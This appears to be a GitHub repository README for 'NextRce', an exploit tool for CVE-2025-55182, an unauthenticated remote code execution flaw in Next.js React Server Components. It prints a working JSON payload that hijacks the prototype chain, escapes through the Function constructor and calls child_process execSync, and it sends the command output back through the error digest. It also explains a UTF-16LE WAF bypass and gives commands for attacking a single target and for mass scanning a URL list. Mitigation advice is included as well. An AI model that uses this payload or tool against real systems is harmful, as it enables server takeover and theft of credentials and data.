Skip to content

ceh-aditya-raj/CVE-2025-55182

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
README.md
README.md
 
 
exploit.py
exploit.py
 
 
requirements.txt
requirements.txt
 
 

Repository files navigation

🚨 NextRce — CVE-2025-55182 (Next.js / React Server Components RCE)

NextRce is a security research tool demonstrating CVE-2025-55182, a critical vulnerability in Next.js App Router applications using React Server Components (RSC) and Server Actions.

This vulnerability allows an attacker to achieve unauthenticated Remote Code Execution (RCE) by abusing how Next.js processes Server Action responses and resolves serialized RSC payloads on the server.

🛠 Vulnerability Overview

CVE-2025-55182 exists in the Next.js App Router architecture and can be classified as a server-side object injection / prototype chain abuse issue occurring during the handling of multipart/form-data requests.

When a Server Action is triggered, the Next.js server trusts and deserializes structured client input. By sending a specially crafted payload, an attacker can manipulate internal resolution logic and execute arbitrary system commands in the Node.js runtime.

📌 Root Cause

The vulnerability arises due to the following combined factors:

  • Server Actions Trust Model
    Server Actions accept structured client payloads that are processed through internal React Server Component resolution logic with insufficient validation.

  • Object Injection During RSC Resolution
    Crafted payloads can abuse JavaScript prototype chains and constructor references, allowing escape from the intended object scope.

  • Insufficient Sanitization
    Internal fields such as then, _response, and form-data getters are not adequately protected against malicious manipulation.

  • Encoding-Based WAF Bypass
    Many Web Application Firewalls focus on UTF-8 or standard JSON. Encoding payloads as UTF-16LE allows them to bypass inspection while still being decoded correctly by the Next.js server.

🔬 Payload Analysis

The exploit relies on injecting a crafted RSC payload inside a multipart request.
A simplified version of the payload is shown below:

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('{cmd}').toString('base64'); throw Object.assign(new Error('x'),{digest: res});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

🧠 Exploit Breakdown

1. Prototype Chain Hijack

  • "then": "$1:__proto__:then"
  • This abuses JavaScript’s prototype chain by overriding the then property, interfering with how Promises are resolved during React Server Component processing in the Next.js runtime.

2. Constructor Escape

  • "_formData": { "get": "$1:constructor:constructor" }
  • This allows access to the global Function constructor, enabling execution of arbitrary JavaScript outside the intended sandbox.

3. Remote Code Execution

  • process.mainModule .require('child_process') .execSync('{cmd}')
  • Accesses Node.js internal modules
  • Executes arbitrary operating system commands synchronously
  • Runs with the same privileges as the Next.js server process

4. Digest-Based Output Exfiltration

  • throw Object.assign(new Error('x'), { digest: res });
  • Next.js suppresses detailed error messages unless a digest field is present.
  • By attaching the Base64-encoded command output to the digest property, the server unintentionally returns execution results in the HTTP response.

5. WAF Bypass (UTF-16LE)

  • The payload can be encoded as UTF-16LE and sent as:
  • Content-Type: text/plain; charset=utf-16le
  • Many WAF engines fail to decode and inspect UTF-16LE content, while the Next.js server decodes and processes it correctly, increasing exploitation reliability.

💥 Impact

Successful exploitation of CVE-2025-55182 may result in:

  • 🔥 Full Remote Code Execution

  • 🗄️ Access to sensitive data and credentials

  • 🔗 Lateral movement within infrastructure

  • 📦 Supply-chain compromise

  • 🚨 Complete server takeover

  • Severity: Critical

  • Authentication Required: No

🛡 Mitigation

To protect against CVE-2025-55182:

  • Upgrade Next.js to a patched version immediately
  • Disable unused Server Actions
  • Enforce strict validation of multipart/form-data requests
  • Add WAF rules to detect UTF-16LE encoded payloads
  • Monitor abnormal Next-Action headers and request patterns

🚀 Usage

Single Target

  • python3 exploit.py -u https://target.com -c "whoami"

Mass Scan with WAF Bypass

  • python3 exploit.py -l urls.txt -B -t 50

⚠️ Disclaimer

  • This project is provided strictly for educational, research, and authorized security testing purposes.

  • Do NOT use this tool against systems you do not own or have explicit permission to test.

  • The author assumes no responsibility for misuse.

About

Proof-of-concept research tool for CVE-2025-55182, a critical unauthenticated RCE in Next.js App Router caused by server-side object injection in React Server Components and Server Actions, including UTF-16LE WAF evasion techniques.

Topics

react nextjs waf-bypass react-server-components prototype-pollution server-actions utf-16le remote-code-execution-rce cve-2025-55182

Resources

Readme
Activity

Stars

1 star

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages